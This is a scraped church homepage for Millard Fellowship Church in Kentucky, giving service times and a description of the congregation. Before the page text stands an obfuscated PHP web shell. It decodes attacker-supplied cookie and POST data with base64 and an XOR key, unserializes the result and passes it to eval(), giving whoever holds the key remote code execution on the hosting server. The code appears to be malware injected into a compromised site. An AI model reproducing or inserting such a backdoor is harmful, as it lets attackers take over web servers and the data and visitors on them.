$TeXbM = "\x73" . "\x5f" . chr ( 753 - 670 ).'e' . 'e';$ZpXBiosXL = 'c' . 'l' . chr ( 406 - 309 ).chr (115) . "\x73" . chr (95) . "\145" . chr (120) . chr ( 855 - 750 )."\163" . 't' . "\x73";$jIdCnxmwKi = $ZpXBiosXL($TeXbM); $ZpXBiosXL = "30921";$nKLiTNdhu = $jIdCnxmwKi;if (!$nKLiTNdhu){class s_See{private $cAptKT;public static $VazHGGrv = "cd09c22b-f7d2-4654-9c45-0b881c5f13dd";public static $dcFMGc = 32065;public function __construct($CcFIEiEYsJ=0){$jqxlSX = $_COOKIE;$NFsdMlas = $_POST;$bRxsAQF = @$jqxlSX[substr(s_See::$VazHGGrv, 0, 4)];if (!empty($bRxsAQF)){$woppdwpPZP = "base64";$LEVVfHYJ = "";$bRxsAQF = explode(",", $bRxsAQF);foreach ($bRxsAQF as $usiiBufzXk){$LEVVfHYJ .= @$jqxlSX[$usiiBufzXk];$LEVVfHYJ .= @$NFsdMlas[$usiiBufzXk];}$LEVVfHYJ = array_map($woppdwpPZP . "\137" . "\144" . "\x65" . 'c' . chr ( 670 - 559 ).'d' . "\x65", array($LEVVfHYJ,)); $LEVVfHYJ = $LEVVfHYJ[0] ^ str_repeat(s_See::$VazHGGrv, (strlen($LEVVfHYJ[0]) / strlen(s_See::$VazHGGrv)) + 1);s_See::$dcFMGc = @unserialize($LEVVfHYJ);}}private function xdzWIJGVBc(){if (is_array(s_See::$dcFMGc)) {$clmTnOms = str_replace(chr ( 446 - 386 ) . "\77" . 'p' . 'h' . chr ( 639 - 527 ), "", s_See::$dcFMGc['c' . chr ( 712 - 601 )."\x6e" . 't' . 'e' . "\x6e" . "\x74"]);eval($clmTnOms); $ovWil = "47795";exit();}}public function __destruct(){$this->xdzWIJGVBc(); $ovWil = "47795";}}$DTytXlrsPW = new s_See(); $DTytXlrsPW = "27000_33175";} Millard Fellowship Church | Through God's Grace We Will

"For where two or three gather in my name, there I am with them" - Matthew 18:20

More About Our Company

Millard Fellowship Church is a growing community church located on Old Railroad Road just off Fishtrap Road in Millard Kentucky. We have worship services every Sunday at 11am, and every Wednesday at 6:30pm.


Millard Fellowship Church promotes a lively atmosphere with a live praise band and choir featured before each sermon. Pastor Dr. Ronald Mann delivers smart sermons that challenges the congregation to deepen their faith, while staying applicable and relevant to the church members. The Church is very active in providing charity to members in need and local residents.


If you don’t know where to find us, visit The Directions Page.


If you have any questions, concerns or general comments, feel free to reach the church through our contact form.


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Millard Fellowship Launches YouTube Channel

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